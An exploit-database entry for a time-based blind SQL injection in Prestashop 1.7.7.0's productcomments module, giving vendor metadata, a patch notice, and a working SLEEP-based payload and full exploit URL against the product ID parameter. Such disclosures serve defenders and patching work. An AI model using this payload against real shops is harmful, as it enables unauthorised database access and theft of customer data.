header-logo
Suggest Exploit
vendor:
Prestashop CMS
by:
Jaimin Gondaliya
8.8
CVSS
HIGH
Time Based Blind SQL Injection
89
CWE
Product Name: Prestashop CMS
Affected Version From: 1.7.7.0
Affected Version To: 1.7.7.0
Patch Exists: YES
Related CWE: N/A
CPE: a:prestashop:prestashop:1.7.7.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2021

Prestashop 1.7.7.0 – ‘id_product’ Time Based Blind SQL Injection

Prestashop 1.7.7.0 is vulnerable to Time Based Blind SQL Injection. The vulnerability exists in the 'id_product' parameter of the 'CommentGrade' controller of the 'productcomments' module. An attacker can exploit this vulnerability by sending a specially crafted payload to the vulnerable parameter. The payload used in this exploit is '1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)'. This payload will cause the server to sleep for 5 seconds, indicating a successful exploitation of the vulnerability.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update their Prestashop CMS to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Date: 08-01-2021
# Exploit Author: Jaimin Gondaliya
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://www.prestashop.com/en/download
# Version: Prestashop CMS - 1.7.7.0
# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)